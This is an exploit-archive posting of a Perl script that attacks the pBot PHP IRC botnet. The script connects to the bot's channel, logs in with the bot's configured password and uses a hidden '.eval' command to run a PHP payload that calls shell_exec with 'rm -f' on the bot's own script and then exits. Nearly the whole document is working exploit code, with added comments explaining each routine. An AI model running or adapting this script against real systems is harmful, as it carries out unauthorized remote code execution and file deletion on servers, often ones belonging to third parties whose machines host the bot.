
pBot Remote Code Execution

pBot Remote Code Execution
Posted Jul 31, 2012
Authored by bwall

This Perl script attacks pBot by leveraging a hidden .eval command to delete and kill the bot.

tags | exploit, perl
MD5 | c1cdb50ab422a8f2053d5be0a1f8b058

#!/usr/bin/perl
# Exploit Title: pBot Remote Code Execution ("*" hostauth)
# Date: 31.07.2012
# Exploit Author: @bwallHatesTwits
# Software Link: https://www.firebwall.com/decoding/read.php?u=620d21fd31b87046e94975e03fdafa8a (decoded from attempted attack)
# Version: Various versions
# Tested on: Linux 3.2

use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;

# Identity presented to the IRC server (nick, ident and real name).
# NOTE(review): this block mixes lexicals ("my") with undeclared package
# globals; the script never enables strict, so the globals are created on
# first assignment and are what the subs below read.
my $nickname = "BotSlayer";
my $ident = "BotSlayer";
my $fullname = "BotSlayer";
# Select set polled by the main loop for readable sockets.
$sel_client = IO::Select->new();

#configuration values from the bot source
# These mirror the target bot's own settings so the script lands on the same
# server and channels and can issue the bot's login command (see onJoin).
$ircserver = "localhost"; #"server"
$ircserverpass = ""; #"pass"
my $ircport = "6667"; #"port"
#if "key" is set, then add a space and the password to the chan name
my @channels = ("#anonbxu"); #"chan" and "chan2"
$botPass = "hello"; #"password"
$botTrigger = "."; #"trigger"
#hostauth must be "*"
# Per the title and the line above, the technique relies on the bot accepting
# commands from any hostmask (wildcard hostauth).
$loginCMD = "user"; #usually user or login

#payload - PHP code to run
#This version deletes the bots originating script, and dies
# Passed verbatim as the argument of the bot's eval command in onJoin().
$phpEval = "shell_exec(\"rm -f \".\$_SERVER['SCRIPT_NAME']);exit();";

# Channels still awaiting delivery; tryQuit() decrements this and disconnects
# when it reaches zero.
$channelCount = scalar(@channels);

# Called by parse() for every JOIN line the server reports. Receives the raw
# JOIN argument; the first character is dropped, presumably because the
# server echoes the target with a leading ':' (e.g. ":#chan") -- confirm.
# NOTE(review): the strip is unconditional, so a JOIN argument without the
# ':' prefix would lose its '#'.
sub onJoin
{
my $channel = shift;
$channel = substr($channel, 1);
print "Joined $channel\n";
# Bot login: trigger + login command + the bot's password.
say($channel, $botTrigger.$loginCMD." $botPass");
# Pause between login and the eval command (presumably so the bot processes
# the login first -- not documented in the original).
sleep(1);
say($channel, $botTrigger."eval \@BallastSec ".$phpEval);
print "Payload delivered\n";
# One channel handled; quit once every configured channel has been covered.
tryQuit();
}

# Account for one finished channel and leave the server once all of them
# are done.
#
# Decrements the package global $channelCount (initialised to the number of
# configured channels) and calls quit() exactly when it reaches zero. Extra
# calls after that push the counter negative and never quit again, as in the
# original.
sub tryQuit
{
    return if --$channelCount != 0;
    quit("whomp wha");
}

# Write one raw IRC line to a socket, appending the newline.
#
# Two call forms are accepted: sendraw($socket, $text) writes to the given
# handle; sendraw($text) writes to the package global $IRC_cur_socket, the
# connection the main loop is currently servicing. Any other argument count
# falls back to the one-argument form using $_[0].
sub sendraw
{
    my ($handle, $text) = @_ == 2 ? @_ : ($IRC_cur_socket, $_[0]);
    print {$handle} "$text\n";
}

# Open a TCP connection to the IRC server and register the nick.
#
# Arguments: ($mynick, $ircserver_con, $ircport_con). Returns 1 when the
# socket cannot be created; the return value is otherwise unused (the main
# loop calls conn() in void context). On success the socket becomes the
# package global $IRC_cur_socket, is added to $sel_client, and is recorded
# in %irc_servers under its stringified reference.
sub conn
{
my $mynick = $_[0];
my $ircserver_con = $_[1];
my $ircport_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
# Always true here: the "or return" above already handled the failure case.
if (defined($IRC_socket))
{
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_client->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
$irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
# NOTE(review): "!=" is a numeric comparison; for any non-numeric string it
# reduces to 0 != 0 and is false, so this PASS line is never sent. The
# string operator "ne" was evidently intended.
if($ircserverpass != "")
{
sendraw("PASS ".$ircserverpass);
}
sendraw("NICK ".$mynick);
# USER <ident> <host> <server> :<real name>; the socket's own address is
# used for the host field.
sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname");
sleep 1;
}
}

# Dispatch one line received from the IRC server.
#
# Every line is echoed to STDOUT, then matched against a chain of regexes:
# PING is answered with PONG, JOIN notifications go to onJoin(), PRIVMSG is
# checked for a CTCP VERSION request, NICK changes of our own nick are
# tracked in %irc_servers, and the 001 (RPL_WELCOME) reply triggers a JOIN
# of every configured channel. Reads/writes the globals $mynick,
# $IRC_cur_socket and %irc_servers.
sub parse
{
my $servarg = shift;
print $servarg."\n";
if ($servarg =~ /^PING \:(.*)/)
{
sendraw("PONG :$1");
}
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) JOIN (.+)/)
{
# Fires for any user's JOIN, not only our own: the joining nick in $1 is
# never compared with $mynick before onJoin() runs.
my $channel = $4;
onJoin($channel);
}
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/)
{
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
# Answer a CTCP VERSION request with a NOTICE to the sender.
if ($args =~ /^\001VERSION\001$/)
{
notice("$pn", "\001VERSION BotSlayer by Ballast Security\001");
}
# Dead code: $natrix and $arg are captured but never used. Presumably a
# remnant of the bot source this client was adapted from (see header).
# $mynick is quotemeta'd (\Q...\E) before interpolation into the pattern.
if ($args =~ /^(\Q$mynick\E|\!a)\s+(.*)/ )
{
my $natrix = $1;
my $arg = $2;
}
}
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i)
{
# Follow our own nick changes so later matches against $mynick still work.
if (lc($1) eq lc($mynick))
{
$mynick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
}
}
elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i)
{
# Registration complete: record the nick the server assigned and the
# server name, then join the configured channels.
$mynick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach(@channels)
{
sendraw("JOIN $_");
}
}
}
# Main event loop: keep one connection alive and feed each received line to
# parse(). Never returns; the process ends through quit() -> exit.
my $line_temp;
while(1)
{
# (Re)connect until %irc_servers holds an entry.
# NOTE(review): conn() returns 1 without touching %irc_servers when the
# connect fails, so this inner loop retries with no delay while the server
# is unreachable.
while (!(keys(%irc_servers)))
{
conn($nickname, $ircserver, $ircport);
}
# Presumably guards against an entry created under the empty key when
# $IRC_cur_socket was undefined -- confirm.
delete($irc_servers{''}) if (defined($irc_servers{''}));
# Non-blocking poll; loop again when nothing is readable.
my @ready = $sel_client->can_read(0);
next unless(@ready);
foreach $fh (@ready)
{
# Expose the socket being serviced to sendraw() and parse().
$IRC_cur_socket = $fh;
$mynick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
# Zero bytes: the peer closed. Drop the handle so the outer loop reconnects.
# NOTE(review): there is no "next" here, so the remainder of the body still
# runs for the closed handle.
if ($nread == 0) {
$sel_client->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
# NOTE(review): the s/\r\n$// runs after the split, so it has no effect on
# @lines; the per-line s/\r$// below is what strips the CR.
@lines = split (/\n/, $msg);
$msg =~ s/\r\n$//;
for(my $c=0; $c<= $#lines; $c++)
{
$line = $lines[$c];
# $line_temp looks intended to carry a partial trailing line over to the
# next read, but nothing ever assigns it a non-empty value, so a line that
# straddles two reads is parsed as two fragments.
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
parse("$line");
}
}
}

# PRIVMSG helper: say($target, $text) sends $text to a channel or nick.
# Does nothing (returns an empty list / undef) unless exactly two arguments
# are given. Note the name collides with the 'say' feature keyword; the
# script does not enable that feature, so plain calls reach this sub.
sub say
{
    return unless @_ == 2;
    my ($target, $text) = @_;
    sendraw("PRIVMSG $target :$text");
}

# NOTICE helper: notice($target, $text) sends $text as an IRC NOTICE.
# Does nothing (returns an empty list / undef) unless exactly two arguments
# are given.
sub notice
{
    return unless @_ == 2;
    my ($target, $text) = @_;
    sendraw("NOTICE $target :$text");
}

# Join a channel. The name shadows the CORE::join builtin, which wins for a
# plain join(...) call; this sub is only reachable as &join(...) or
# main::join(...). Nothing in this script calls it (the 001 handler in
# parse() sends JOIN through sendraw directly).
sub join
{
    my ($channel) = @_;
    sendraw("JOIN $channel");
}

# Leave a channel: part($channel) sends the PART command through sendraw().
# Not called anywhere in this script.
sub part
{
    my ($channel) = @_;
    sendraw("PART $channel");
}

# Send QUIT with the given reason and terminate the process. This is the
# only exit path out of the main loop (reached via tryQuit()).
sub quit
{
    my ($reason) = @_;
    sendraw("QUIT :$reason");
    exit;
}
